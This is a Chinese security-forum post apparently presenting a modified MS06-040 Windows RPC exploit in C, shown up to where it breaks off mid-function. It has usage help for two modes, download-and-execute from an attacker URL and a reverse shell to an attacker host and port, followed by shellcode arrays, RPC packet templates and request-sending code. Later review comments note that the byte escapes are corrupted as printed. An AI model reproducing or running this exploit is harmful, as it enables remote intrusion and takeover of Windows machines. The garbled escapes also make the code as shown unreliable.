ms06040 download and reverse shellcode mika修改版

[原创]ms06040 download and reverse shellcode mika 修改版


文章作者:mika[EST]
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

首先感谢macro哥哥的代码,没有这个代码俺也不敢去想修改什么exploit。以前经常看bf弄这个漏洞那个漏洞的,也学到了点东西。有代码了,修改就方便了。程序的运行帮助如下:
F:\work\exploits\Release>ms06040rpc
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
            rewritten by superlone@eviloctal.com
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Usage: ms06040rpc <host> <download url> <os type>

      ms06040rpc <host> <reverse addr> <reverse port> <os type>

<download url>:
          such as:http://192.168.0.128/test.exe

<reverse addr>:
          your host ip address

<reverse port>:
          your host listening port

<os type(1/2)>:
            1: win 2000sp4 2:win xpsp1

^_^Mika is telling you:don't play with fire!

嘿嘿~~~一看就懂吧。

我一开始修改的版本在获得反向shell后,如果退出这个shell后就会造成对方机器出现关机对话框。
不过还好,请BF给解决了。嘿嘿

 

代码在下面:

CODE:

#include <winsock2.h>
#include <Rpc.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>


#pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4")
#pragma comment(lib, "ws2_32")

 


// Decoder-stub parameters consumed by makecode() when it builds the download payload
#define DECODE_LEN 23        // leading bytes of shellcodenew that stay unencoded; XOR encoding starts at this index
#define SC_LEN_OFFSET 8      // index in the stub where makecode() stores the 16-bit payload length
#define ENC_KEY_OFFSET 13    // index in the stub where makecode() stores the chosen XOR key byte
#define ENC_KEY 0xFF         // initial key value; makecode() replaces it with the first key that produces no bad characters


/* Payload assembly buffer (1024 bytes, zero-initialised) and the count of
 * valid bytes in it.  Both are written by makecode() for the download
 * payload or by the reverse-shell branch of Attack(). */
unsigned char sc[1024] = {0};
unsigned int Sc_len = 0;
unsigned char shellcodenew[]={ /* download-and-execute stub, completed by makecode() */
/* Bytes 8-9 (0xEE 0xEE) and byte 13 (0xFF) are placeholders: makecode() writes the
 * 16-bit payload length at SC_LEN_OFFSET and the XOR key at ENC_KEY_OFFSET.  Everything
 * from index DECODE_LEN (23) onward is XOR-encoded by makecode(), and the URL is
 * appended over the trailing string-literal NUL.
 * NOTE(review): every escape on this page reads "/x.." instead of "\x..".  As printed,
 * each "/xNN" is four ASCII characters rather than one byte, so the array does not hold
 * the intended code; the backslashes look like a rendering loss -- restore them before
 * building. */
"/xEB/x10/x5B/x4B/x33/xC9/x66/xB9/xEE/xEE/x80/x34/x0B/xFF/xE2/xFA"
"/xEB/x05/xE8/xEB/xFF/xFF/xFF/xE9/xF2/x00/x00/x00/x5F/x64/xA1/x30"
"/x00/x00/x00/x8B/x40/x0C/x8B/x70/x1C/xAD/x8B/x68/x08/x8B/xF7/x6A"
"/x04/x59/xE8/x92/x00/x00/x00/xE2/xF9/x68/x6F/x6E/x00/x00/x68/x75"
"/x72/x6C/x6D/x54/xFF/x16/x8B/xE8/xE8/x7C/x00/x00/x00/x83/xEC/x20"
"/x8B/xDC/x6A/x20/x53/xFF/x56/x04/xC7/x04/x03/x5C/x61/x2E/x65/xC7"
"/x44/x03/x04/x78/x65/x00/x00/x33/xC0/x50/x50/x53/x57/x50/xFF/x56"
"/x10/x8B/xEC/x81/xED/xBB/x00/x00/x00/x89/x5D/xA0/x8B/x5E/x08/x89"
"/x5D/xA4/x8B/xE5/x81/xEC/xDD/x00/x00/x00/x8D/x85/xA8/xFF/xFF/xFF"
"/x6A/x44/x59/xC6/x00/x00/x40/xE2/xFA/xC7/x45/xA8/x44/x00/x00/x00"
"/x8B/xF4/x8D/x45/xEC/x50/x8D/x4D/xA8/x51/x6A/x00/x6A/x00/x6A/x20"
"/x6A/x00/x6A/x00/x6A/x00/x6A/x00/x8B/x55/xA0/x52/xFF/x55/xA4/x3B"
"/xF4/xE8/xA4/x07/x00/x00/xFF/x56/x0C/x51/x56/x8B/x75/x3C/x8B/x74"
"/x2E/x78/x03/xF5/x56/x8B/x76/x20/x03/xF5/x33/xC9/x49/x41/xAD/x03"
"/xC5/x33/xDB/x0F/xBE/x10/x3A/xD6/x74/x08/xC1/xCB/x0D/x03/xDA/x40"
"/xEB/xF1/x3B/x1F/x75/xE7/x5E/x8B/x5E/x24/x03/xDD/x66/x8B/x0C/x4B"
"/x8B/x5E/x1C/x03/xDD/x8B/x04/x8B/x03/xC5/xAB/x5E/x59/xC3/xE8/x09"
"/xFF/xFF/xFF/x8E/x4E/x0E/xEC/xC1/x79/xE5/xB8/x72/xFE/xB3/x16/xEF"
"/xCE/xE0/x60/x36/x1A/x2F/x70"
};
unsigned char connectbacksc[]=
/* Reverse-connect stub.  Attack() overwrites bytes 160-163 (0xca 0x6e 0x84 0x0b,
 * directly after a 0x68 opcode) with the IPv4 address from inet_addr() and bytes
 * 166-167 (0x10 0xe1, after 0x66 0x68) with the port in network order, then copies
 * the whole array -- including the string-literal NUL -- into sc and sets Sc_len
 * to sizeof(connectbacksc).  Nothing here is XOR-encoded.
 * NOTE(review): the "/x" escapes on this page appear to be "\x" with the backslash
 * lost in rendering; as printed the array is ASCII text, not bytes. */
"/xfc/x6a/xeb/x4d/xe8/xf9/xff/xff/xff/x60/x8b/x6c/x24/x24/x8b/x45"
"/x3c/x8b/x7c/x05/x78/x01/xef/x8b/x4f/x18/x8b/x5f/x20/x01/xeb/x49"
"/x8b/x34/x8b/x01/xee/x31/xc0/x99/xac/x84/xc0/x74/x07/xc1/xca/x0d"
"/x01/xc2/xeb/xf4/x3b/x54/x24/x28/x75/xe5/x8b/x5f/x24/x01/xeb/x66"
"/x8b/x0c/x4b/x8b/x5f/x1c/x01/xeb/x03/x2c/x8b/x89/x6c/x24/x1c/x61"
"/xc3/x31/xdb/x64/x8b/x43/x30/x8b/x40/x0c/x8b/x70/x1c/xad/x8b/x40"
"/x08/x5e/x68/x8e/x4e/x0e/xec/x50/xff/xd6/x66/x53/x66/x68/x33/x32"
"/x68/x77/x73/x32/x5f/x54/xff/xd0/x68/xcb/xed/xfc/x3b/x50/xff/xd6"
"/x5f/x89/xe5/x66/x81/xed/x08/x02/x55/x6a/x02/xff/xd0/x68/xd9/x09"
"/xf5/xad/x57/xff/xd6/x53/x53/x53/x53/x43/x53/x43/x53/xff/xd0/x68"
"/xca/x6e/x84/x0b/x66/x68/x10/xe1/x66/x53/x89/xe1/x95/x68/xec/xf9"
"/xaa/x60/x57/xff/xd6/x6a/x10/x51/x55/xff/xd0/x66/x6a/x64/x66/x68"
"/x63/x6d/x6a/x50/x59/x29/xcc/x89/xe7/x6a/x44/x89/xe2/x31/xc0/xf3"
"/xaa/x95/x89/xfd/xfe/x42/x2d/xfe/x42/x2c/x8d/x7a/x38/xab/xab/xab"
"/x68/x72/xfe/xb3/x16/xff/x75/x28/xff/xd6/x5b/x57/x52/x51/x51/x51"
"/x6a/x01/x51/x51/x55/x51/xff/xd0/x68/xad/xd9/x05/xce/x53/xff/xd6"
"/x6a/xff/xff/x37/xff/xd0/x68/xe7/x79/xc6/x79/xff/x75/x04/xff/xd6"
"/xff/x77/xfc/xff/xd0/x68/xef/xce/xe0/x60/x53/xff/xd6/xff/xd0";
BYTE Data2000[] = /* request stub for Windows 2000 (i == 1 in Attack()): 1128 bytes, which is
 * the AllocHint and the value added to FragLength.  Attack() keeps the first 32 bytes
 * and copies sc over the bytes from offset 32 on; the original has no check that
 * Sc_len fits in the remaining 1096 bytes.  The original note says the argument size
 * must stay below 5000.  The string-literal initializer adds one trailing NUL that
 * is never sent.  The repeated 04 08 02 00 words near the end look like a pointer
 * pattern used by the overflow -- not verified here.
 * NOTE(review): "/x" escapes on this page appear to be "\x" with the backslash lost. */
{"/x75/x6b/x22"
"/x56/x01/x00/x00/x00/x00/x00/x00/x00/x01/x00/x00/x00/x00/x00/x1b"
"/xf7/x15/x02/x00/x00/x00/x00/x00/x00/x15/x02/x00/x00/x4a/xf9/x42"
"/xf5/x93/x4a/x93/x37/x93/xf5/x92/x9b/x93/x27/x4f/x47/x49/x37/xd6"
"/xfc/xfd/x27/x4a/x90/x90/x40/x9f/x9f/x9b/x3f/xfd/xf9/x43/x4b/x92"
"/x40/x43/x4e/x96/x49/x90/x93/x3f/x91/x98/x96/xf8/x4a/x99/x3f/x43"
"/xf5/x40/x9f/x47/x9b/x98/x41/x9f/x4b/x3f/x40/x42/x4a/x92/x90/x4f"
"/x92/x46/x96/x40/x41/xfd/x41/x3f/x96/x43/x4e/x49/x43/x4f/x91/xfc"
"/x4f/x93/x3f/x27/x96/x91/x37/x97/x98/x98/x98/x4a/xf5/x91/x96/x93"
"/x93/x47/x97/x49/x96/x97/xf5/xd6/x47/x91/x91/x90/x42/x48/x98/x42"
"/x49/x3f/x93/x90/x93/x4e/x47/x47/x99/x92/x27/xfd/xfd/xfc/x4b/x91"
"/x4b/x43/x4b/xd6/x46/x37/x92/xf5/x46/x4f/x99/x9f/xd6/x97/xf5/x9b"
"/xf8/x43/xf8/x97/x4f/x3f/x41/x27/x96/x92/x27/x93/x4b/x98/x9b/x48"
"/x47/xf8/x93/x48/xfc/x98/xf5/x91/x4f/x9f/x42/x4a/x48/x4a/x97/x4e"
"/x91/x49/x90/xf8/x91/x4f/x92/x96/x92/xd6/x47/x98/x90/x40/xf5/xfc"
"/x46/xf5/x46/xf9/xd6/x4f/xfc/x98/x91/x41/x91/x48/xfc/x98/x49/x49"
"/xfc/x41/x37/x46/x46/xf5/x90/x3f/x48/x4a/x40/x37/x47"
"/x41/xf5/x93"
"/xf8/x40/x92/x49/x4a/x37/xfd/xf8/x93/x9b/x46/x47/x47/x92/x92/x92"
"/x93/x99/x93/x93/xfd/x3f/x42/x47/x90/x96/x92/x4f/x4a/x4a/x93/x93"
"/x46/x3f/xf9/xfd/x90/x9b/x97/x47/x9b/x91/x49/xd6/x97/x91/x4b/x40"
"/x27/x46/x42/x91/x48/x97/x4e/x93/x90/x96/x49/xf5/xf9/x43/x4b/x41"
"/xf5/x48/xfd/x4b/x41/x43/x40/x4b/xf9/x97/xfd/xfc/xf9/xfc/xf9/x96"
"/x9f/x99/xd6/x41/x4a/xd6/x27/x4a/x99/x27/x48/xf5/xf9/x90/x37/x42"
"/x91/x40/xfc/x4b/x41/x96/x90/x9f/xfc/x47/xf5/x27/xf5/x92/x47/x96"
"/x4a/x4f/x92/x46/x98/x4b/x92/x3f/x41/xf8/x46/xd6/xfc/x27/x27/x49"
"/x49/x9f/x27/x4f/x92/x46/xd6/x41/xf9/x37/x37/x97/xfc/x91/xf5/x46"
"/x47/x48/xfd/x96/xf5/x90/x90/x4b/x9b/xfd/xf8/xf8/x4a/x27/x46/x91"
"/x99/x93/x93/xd6/x97/xf9/x43/x9b/xfc/xd6/xfd/x41/xd6/xd6/x9f/x97"
"/x4f/x49/x9b/xd6/x42/x37/x40/xf8/x9b/xfc/x90/xfd/x42/xd6/x41/x49"
"/x97/x3f/x99/x93/xf8/x49/x27/x97/xd6/x92/x47/x93/x4e/x9f/x37/xd6"
"/xfd/xd6/x4b/x42/x46/x91/x4a/x9f/x91/x49/x90/x4e/x49/x48/x98/x27"
"/xd6/x46/x90/x43/x3f/xf9/xf8/x48/x3f/x40/x4b/x9f/x37/x9b/xd6/xfd"
"/x40/xd6/x99/x47/x46/x97/x90/x49/x4e/xfd/x93/x3f/x3f"
"/x4a/xd6/x40"
"/x96/xd6/xf9/x27/xfd/x4f/x43/x90/xf8/x42/xd6/x92/x43/x96/x91/x4a"
"/x46/x4f/xfd/x92/xfc/x40/x37/x97/xf5/xf5/x97/x92/x4b/x99/xf8/x37"
"/xf5/x40/x98/x40/xfc/x42/xf9/x4b/x99/x43/x40/x97/x48/x4e/x49/x41"
"/xf9/x90/x49/xfc/x47/xfd/x93/x48/x42/x4a/x40/xd6/x96/x37/x27/x43"
"/x49/x92/x4f/x41/x93/xd6/x4e/x9f/x43/x98/x4e/xd6/x96/x3f/x9f/x4b"
"/x4a/x99/x47/x37/xfc/xf9/xd6/x99/xf8/x27/x4b/x47/x90/xf9/x49/x4b"
"/xd6/xfd/x99/x90/x4e/x98/xfd/x4b/x96/x43/x4f/x3f/x4a/x90/xf9/x42"
"/x96/x40/x4e/x37/x99/x48/x40/x49/x27/x97/x92/xd6/x37/x93/x37/x46"
"/xfd/x96/x42/x9b/xf8/x9b/x4b/x97/x40/x91/x4b/x93/xd6/x4f/x42/x9f"
"/x4b/x4e/xf5/xfd/x91/x99/xfc/x99/x92/x27/x3f/xf9/x49/xfc/xf5/xf5"
"/x37/x3f/xd6/x92/x4b/xf9/x3f/x97/x4b/x9b/x4f/x49/x47/x47/x3f/xfd"
"/x98/xd6/x37/x4b/x4a/x91/x90/x27/x3f/x97/xf9/xd6/xd6/x90/x40/x40"
"/x43/x43/x40/xf8/x90/x96/x92/x48/x96/x27/xf9/x99/x96/x96/x4f/x96"
"/x4b/x4f/x98/xf9/x41/x93/x99/xd6/x9b/x97/x4e/x4e/xfd/x46/x37/x9f"
"/x40/xfd/x97/x47/x9b/x41/x43/x42/x4e/x40/x4e/x3f/x37/x97/x9f/x37"
"/xfd/x92/x98/x90/x91/xfd/x90/xf8/xfc/x93/x96/x91/x41"
"/x4f/x9f/x46"
"/x92/x27/x4f/x3f/x40/x37/x91/x4e/x4f/xf5/x99/x3f/x4a/x93/x99/x9f"
"/xf5/x90/x46/x93/x43/x27/x27/x4f/x4e/x91/x42/x6a/x35/x59/xd9/xee"
"/xd9/x74/x24/xf4/x5b/x81/x73/x13/xd3/x45/x7d/xa2/x83/xeb/xfc/xe2"
"/xf4/x52/x81/x82/x4d/x2c/xba/x39/x5e/x3b/x01/x7d/xa2/xd3/xce/x38"
"/x9e/x58/x39/x78/xda/xd2/xaa/xf6/xed/xcb/xce/x22/x82/xd2/xae/x34"
"/x29/xe7/xce/x7c/x4c/xe2/x85/xe4/x0e/x57/x85/x09/xa5/x12/x8f/x70"
"/xa3/x11/xae/x89/x99/x87/x61/x79/xd7/x36/xce/x22/x86/xd2/xae/x1b"
"/x29/xdf/x0e/xf6/xfd/xcf/x44/x96/x29/xcf/xce/x7c/x49/x5a/x19/x59"
"/xa6/x10/x74/xbd/xc6/x58/x05/x4d/x27/x13/x3d/x71/x29/x93/x49/xf6"
"/xd2/xcf/xe8/xf6/xca/xdb/xae/x74/x29/x53/xf5/x7d/xa2/xd3/xce/x15"
"/x9e/x8c/x74/x8b/xc2/x85/xcc/x85/x21/x13/x3e/x2d/xca/x3c/x8b/x9d"
"/xc2/xbb/xdd/x83/x28/xdd/x12/x82/x45/xb0/x28/x19/x8c/xb6/x3d/x18"
"/x82/xfc/x26/x5d/xcc/xb6/x31/x5d/xd7/xa0/x20/x0f/x82/xe2/x77/x4e"
"/x82/xe2/x77/x4e/x82/xfc/x04/x39/xe6/xf3/x63/x5b/x82/xbd/x20/x09"
"/x82/xbf/x2a/x1e/xc3/xbf/x22/x0f/xcd/xa6/x35/x5d/xe3/xb7/x28/x14"
"/xcc/xba/x36/x09/xd0/xb2/x31/x12/xd0/xa0/x65/x4c/x90"
"/xe0/x65/x52/xe3/x97/x01/x7d/xa2"
"/x04/x08/x02/x00/x04/x08/x02/x00/x04/x08/x02/x00/x04/x08/x02/x00"
"/x04/x08/x02/x00/x04/x08/x02/x00/x04/x08/x02/x00/x04/x08/x02/x00"
"/x04/x08/x02/x00/x04/x08/x02/x00/x04/x08/x02/x00/x04/x08/x02/x00"
"/x04/x08/x02/x00/x04/x08/x02/x00/x04/x08/x02/x00/x04/x08/x02/x00"
"/x00/x00/x93/xc8/xf5/x00/x00/x00/x02/x00/x00/x00/x00/x00/x00/x00"
"/x02/x00/x00/x00/xeb/x02/x00/x00/x28/x00/x00/x00/x00/x00/x00/x00"
};
BYTE Dataxp[] = /* request stub for Windows XP (i == 2 in Attack(); the original comment said
 * win2000, but this array is only used on the XP path): 772 bytes, which is the
 * AllocHint and the value added to FragLength.  Attack() keeps the first 32 bytes,
 * copies sc over the bytes from offset 32 on, and sends the result twice; it has no
 * check that Sc_len fits in the remaining 740 bytes.  The original note says the
 * argument size must stay below 5000.  The string-literal initializer adds one
 * trailing NUL that is never sent.
 * NOTE(review): "/x" escapes on this page appear to be "\x" with the backslash lost. */
{"/x0e/x4c/x9f/xe6/x01/x00/x00/x00"
"/x00/x00/x00/x00/x01/x00/x00/x00/x00/x00/xc8/x52/x63/x01/x00/x00"
"/x00/x00/x00/x00/x63/x01/x00/x00/xfd/x4e/x4a/x48/x43/x4f/x47/x99"
"/x93/xf8/x3f/x40/x98/x92/x9f/x91/x93/x43/xf5/x90/x4e/xd6/x92/x27"
"/x91/x48/x99/xf5/x49/x43/x4e/x93/x49/x43/x90/x98/x4a/x98/x4e/x4f"
"/x27/x46/xf9/x96/xd6/x90/x40/xfc/xfc/x93/x91/xf8/x4f/x27/x98/x42"
"/x4f/x96/x48/x41/x90/x4a/x42/x9f/xfd/x98/x91/x91/x46/x41/x41/x92"
"/x3f/xfc/x99/x93/x4e/x96/x40/x91/x98/x43/x96/x93/xf5/xd6/x4f/x9b"
"/x27/x9f/x9b/xfd/x99/x3f/xfd/x4f/xd6/x91/x4a/x96/x98/xfd/xf9/x9b"
"/x37/x41/xfc/x9f/x42/x4a/x40/xf8/x43/x4a/x98/x41/x91/x91/xf9/xd6"
"/xd6/x9b/x49/x42/x3f/x90/xfc/x9b/x4b/x92/xfc/x37/x96/xfc/x41/x98"
"/xfc/x4f/x4e/x91/x97/x4a/x92/x49/x92/x9f/x91/x41/x4a/x41/x98/x27"
"/x98/xd6/x91/x48/xfc/xfc/xf5/x4b/x9f/x9f/xfc/xd6/xf8/x49/x6a/x35"
"/x59/xd9/xee/xd9/x74/x24/xf4/x5b/x81/x73/x13/x60/xd2/x21/xae/x83"
"/xeb/xfc/xe2/xf4/xe1/x16/xde/x41/x9f/x2d/x65/x52/x88/x96/x21/xae"
"/x60/x59/x64/x92/xeb/xae/x24/xd6/x61/x3d/xaa/xe1/x78/x59/x7e/x8e"
"/x61/x39/x68/x25/x54/x59/x20/x40/x51/x12/xb8/x02/xe4/x12/x55/xa9"
"/xa1/x18/x2c/xaf/xa2/x39/xd5/x95/x34/xf6/x25/xdb/x85/x59/x7e/x8a"
"/x61/x39/x47/x25/x6c/x99/xaa/xf1/x7c/xd3/xca/x25/x7c/x59/x20/x45"
"/xe9/x8e/x05/xaa/xa3/xe3/xe1/xca/xeb/x92/x11/x2b/xa0/xaa/x2d/x25"
"/x20/xde/xaa/xde/x7c/x7f/xaa/xc6/x68/x39/x28/x25/xe0/x62/x21/xae"
"/x60/x59/x49/x92/x3f/xe3/xd7/xce/x36/x5b/xd9/x2d/xa0/xa9/x71/xc6"
"/x8f/x1c/xc1/xce/x08/x4a/xdf/x24/x6e/x85/xde/x49/x03/xbf/x45/x80"
"/x05/xaa/x44/x8e/x4f/xb1/x01/xc0/x05/xa6/x01/xdb/x13/xb7/x53/x8e"
"/x51/xe0/x12/x8e/x51/xe0/x12/x8e/x4f/x93/x65/xea/x40/xf4/x07/x8e"
"/x0e/xb7/x55/x8e/x0c/xbd/x42/xcf/x0c/xb5/x53/xc1/x15/xa2/x01/xef"
"/x04/xbf/x48/xc0/x09/xa1/x55/xdc/x01/xa6/x4e/xdc/x13/xf2/x10/x9c"
"/x53/xf2/x0e/xef/x24/x96/x21/xae/x31/x76/x57/x4e/x65/x59/x45/x4d"
"/x69/x73/x49/x39/x76/x32/x39/x52/x74/x55/x5a/x57/x6c/x6e/x6b/x4b"
"/x51/x64/x39/x4e/x55/x32/x73/x31/x71/x44/x6f/x55/x4d/x44/x6f/x70"
"/x33/x58/x47/x70/x35/x34/x7a/x6e/x61/x4c/x6d/x4e/x39/x30/x50/x39"
"/x47/x4d/x64/x50/x46/x63/x4b/x61/x74/x63/x62/x38/x44/x69/x76/x76"
"/x39/x49/x61/x51/x41/x5a/x37/x36/x6e/x6a/x6f/x6d/x7a/x6e/x46/x43"
"/x46/x79/x4e/x6e/x4c/x4d/x53/x48/x7a/x46/x77/x78/x47/x63/x52/x5a"
"/x35/x30/x6f/x42/x33/x42/x57/x38/x56/x59/x7a/x47/x6b/x78/x62/x6b"
"/x76/x68/x79/x63/x4b/x68/x42/x69/x46/x53/x54/x39/x4a/x6e/x38/x74"
"/x75/x72/x78/x50/x69/x6d/x61/x57/x70/x62/x76/x36/x38/x74/x77/x69"
"/x62/x6b/x4a/x59/x38/x52/x75/x63/x6c/x5a/x62/x77/x32/x51/x6f/x4b"
"/x75/x4c/x6d/x32/x48/x6c/x50/x4f/x37/x53/x48/x74/x34/x65/x4f/x35"
"/x58/x6e/x47/x53/x69/x56/x48/x62/x36/x52/x78/x35/x7a/x61/x4b/x37"
"/x6f/x64/x49/x31/x4b/x6f/x38/x31/x35/x4c/x33/x61/x0a/x08/x02/x00"
"/x77/x6d/x4f/x36/x48/x7a/x47/x79/x04/x08/x02/x00/x7a/x37/x38/x43"
"/x47/x50/x59/x78/x34/x31/x79/x68/x55/x30/x4c/x6b/x61/x43/x6b/x70"
"/x67/x68/x70/x49/x4d/x55/x74/x55/x73/x45/x74/x5a/x04/x08/x02/x00"
"/x5a/x7a/x44/x68/x56/x75/x4e/x6c/x04/x08/x02/x00/x7a/x52/x66/x53"
"/x66/x5a/x54/x49/x75/x56/x6a/x63/x75/x5a/x66/x55/x4c/x6d/x64/x4d"
"/x45/x36/x42/x62/x74/x34/x36/x46/x54/x58/x66/x46/x00/x00/x43/x07"
"/xc7/x00/x00/x00/x01/x00/x00/x00/x00/x00/x00/x00/x01/x00/x00/x00"
"/x00/x00/x8d/xc1/x61/x00/x00/x00/x00/x00/x00/x00"
};

/*
 * In-memory image of the bind PDU template PRPC (0x48 bytes).
 * BindRpcInterface() memcpy()s PRPC over this struct, writes only
 * InterfaceUUID / InterfaceVerMaj / InterfaceVerMin, and sends
 * sizeof(RPCBIND) bytes of it down the pipe.
 *
 * NOTE(review): there is no packing pragma, so the layout depends on the
 * compiler's default alignment.  With natural alignment the struct comes to
 * 72 bytes and InterfaceUUID lands at offset 32, where PRPC carries its UUID,
 * but ContextID/NumTransItems sit at offsets 26/28 while PRPC carries the
 * 0x01 "one transfer syntax" byte at offset 30.  That only works because
 * those two fields are never written after the copy, so the template bytes
 * go out unchanged.  Confirm sizeof(struct RPCBIND) == sizeof(PRPC) on the
 * target compiler before touching either.
 */
struct RPCBIND
{
BYTE VerMaj;            /* offset 0  */
BYTE VerMin;            /* offset 1  */
BYTE PacketType;        /* offset 2  */
BYTE PacketFlags;       /* offset 3  */
DWORD DataRep;          /* offset 4  */
WORD FragLength;        /* offset 8  */
WORD AuthLength;        /* offset 10 */
DWORD CallID;           /* offset 12 */
WORD MaxXmitFrag;       /* offset 16 */
WORD MaxRecvFrag;       /* offset 18 */
DWORD AssocGroup;       /* offset 20 */
BYTE NumCtxItems;       /* offset 24 */
WORD ContextID;         /* offset 26 with natural alignment -- never written, see note */
WORD NumTransItems;     /* offset 28 with natural alignment -- never written, see note */
GUID InterfaceUUID;     /* offset 32 -- set by BindRpcInterface() via UuidFromString */
WORD InterfaceVerMaj;   /* offset 48 -- set by BindRpcInterface() */
WORD InterfaceVerMin;   /* offset 50 -- set by BindRpcInterface() */
GUID TransferSyntax;    /* offset 52 -- taken verbatim from PRPC */
DWORD SyntaxVer;        /* offset 68 -- taken verbatim from PRPC */
};
/* Bind PDU template, 0x48 = 72 bytes, copied over struct RPCBIND by BindRpcInterface().
 * Row 1: version 5.0, PacketType 0x0B, PacketFlags 0x03, DataRep 0x10 (little-endian),
 *        FragLength 0x48, AuthLength 0, CallID 1.
 * Row 2: MaxXmitFrag/MaxRecvFrag 0x10B8, AssocGroup 0, one context item, context id 0,
 *        one transfer syntax (the 0x01 at offset 30).
 * Row 3: interface UUID placeholder -- replaced by BindRpcInterface() with the UUID
 *        main() passes in.
 * Rows 4-5: interface version 0.0 (overwritten), transfer syntax UUID
 *        8a885d04-1ceb-11c9-9fe8-08002b104860, transfer syntax version 2. */
BYTE PRPC[0x48] ={0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0xB8,0x10,0xB8,0x10,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00,
0x6A,0x28,0x19,0x39,0x0C,0xB1,0xD0,0x11,0x9B,0xA8,0x00,0xC0,0x4F,0xD9,0x2E,0xF5,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};/* bind template used by BindRpcInterface() */

/*
 * Request PDU header, 24 bytes.  With natural alignment no padding is needed
 * (4x1 + 4 + 2 + 2 + 4 + 4 + 2 + 2 = 24), which is what Attack() relies on
 * when it memcpy()s the POP template over this struct and then copies
 * exactly 24 bytes to the front of the outgoing buffer.  Attack() sets
 * FragLength = 24 + stub size, AllocHint = stub size and Opnum = 31 before
 * sending.
 */
struct RPCFUNC
{
BYTE VerMaj;        /* offset 0  */
BYTE VerMin;        /* offset 1  */
BYTE PacketType;    /* offset 2  */
BYTE PacketFlags;   /* offset 3  */
DWORD DataRep;      /* offset 4  */
WORD FragLength;    /* offset 8  -- header + stub length, set per target by Attack() */
WORD AuthLength;    /* offset 10 */
DWORD CallID;       /* offset 12 */
DWORD AllocHint;    /* offset 16 -- stub length, set per target by Attack() */
WORD ContextID;     /* offset 20 */
WORD Opnum;         /* offset 22 -- Attack() sets 31 */
};
/* Request PDU header template (24 bytes, the image of struct RPCFUNC):
 * version 5.0, PacketType 0x00, PacketFlags 0x03, DataRep 0x10, FragLength 0x0480
 * (= 24 + 1128), AuthLength 0, CallID 1, AllocHint 0x0468 (= 1128), ContextID 0,
 * Opnum 0x1f (31).  Attack() overwrites FragLength, AllocHint and Opnum per target,
 * so only the leading 16 bytes are used unchanged.  The string-literal initializer
 * adds a 25th NUL byte that is never copied. */
BYTE POP[] =
{
"/x05/x00/x00/x03/x10/x00/x00/x00/x80/x04/x00/x00/x01/x00/x00/x00"
"/x68/x04/x00/x00/x00/x00/x1f/x00"
};


void makecode(char *url);

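/*
 * Send a DCE/RPC bind for the given interface over an already-open named pipe.
 *
 * PH            pipe handle opened by main()
 * Interface     interface UUID as text, e.g. "4b324fc8-1670-01d3-1278-5a47bf6ee188"
 * InterfaceVer  interface version as "major.minor", e.g. "3.0"
 *
 * Returns 0 when the bind PDU was written and a reply came back, -1 when the
 * UUID or version string is malformed, the struct/template sizes disagree, or
 * TransactNamedPipe() failed.  The bind_ack is read into a scratch buffer and
 * not examined, as in the original.
 *
 * Changes from the original: the UuidFromString() result is checked (a bad
 * UUID used to go out as whatever was in the template), the UuidToString()
 * call whose RPC-allocated result was never used or freed is gone, the
 * version is parsed with strtol() instead of atoi(&ver[0]) / atoi(&ver[2])
 * (which read past the end of anything shorter than three characters), and
 * the transaction result is reported.
 */
int BindRpcInterface(HANDLE PH, char *Interface, char *InterfaceVer) {
    BYTE rbuf[0x1000] = "";
    DWORD dw = 0;
    struct RPCBIND RPCBind;
    char *end = NULL;
    long maj, min;

    /* PRPC is the 0x48-byte template; the struct must image it exactly or the
     * UUID/version patches below land on the wrong bytes. */
    if (sizeof(RPCBind) != sizeof(PRPC)) {
        fprintf(stderr, "[-] struct RPCBIND is %u bytes but the bind template is %u\n",
                (unsigned)sizeof(RPCBind), (unsigned)sizeof(PRPC));
        return -1;
    }
    memcpy(&RPCBind, PRPC, sizeof(RPCBind));

    if (UuidFromString((unsigned char *)Interface, &RPCBind.InterfaceUUID) != RPC_S_OK) {
        fprintf(stderr, "[-] bad interface UUID: %s\n", Interface);
        return -1;
    }

    /* "major.minor"; both halves must be present and fit in a WORD */
    maj = strtol(InterfaceVer, &end, 10);
    if (end == InterfaceVer || *end != '.') {
        fprintf(stderr, "[-] bad interface version: %s\n", InterfaceVer);
        return -1;
    }
    min = strtol(end + 1, &end, 10);
    if (*end != '\0' || maj < 0 || maj > 0xFFFF || min < 0 || min > 0xFFFF) {
        fprintf(stderr, "[-] bad interface version: %s\n", InterfaceVer);
        return -1;
    }
    RPCBind.InterfaceVerMaj = (WORD)maj;
    RPCBind.InterfaceVerMin = (WORD)min;

    if (!TransactNamedPipe(PH, &RPCBind, sizeof(RPCBind), rbuf, sizeof(rbuf), &dw, NULL)) {
        fprintf(stderr, "[-] bind transaction failed (error %lu)\n", (unsigned long)GetLastError());
        return -1;
    }
    return 0;
}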

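/*
 * Build one 24 + datalen byte request (RPCFUNC header followed by the
 * target's stub) and push it through the pipe.  When inject is non-zero the
 * Sc_len bytes in sc are spliced in at stub offset 32, exactly where the
 * original wrote them; the caller is responsible for checking that they fit.
 *
 * Returns 0 when TransactNamedPipe() succeeded, -1 on allocation failure or a
 * failed transaction.  A failed transaction is reported rather than treated
 * as fatal: once the request lands the remote side may simply stop answering.
 */
static int send_request(HANDLE PipeHandle, const struct RPCFUNC *hdr,
                        const BYTE *data, unsigned int datalen, int inject)
{
    BYTE rbuf[0x100] = "";
    DWORD dw = 0;
    BOOL ok;
    BYTE *LargeBuffer = (BYTE *)malloc(24 + datalen);

    if (LargeBuffer == NULL) {
        fprintf(stderr, "[-] out of memory building the request\n");
        return -1;
    }
    memset(LargeBuffer, 0x00, 24 + datalen);
    memcpy(LargeBuffer, hdr, 24);            /* 24 == sizeof(struct RPCFUNC) */
    memcpy(LargeBuffer + 24, data, datalen);
    if (inject) {
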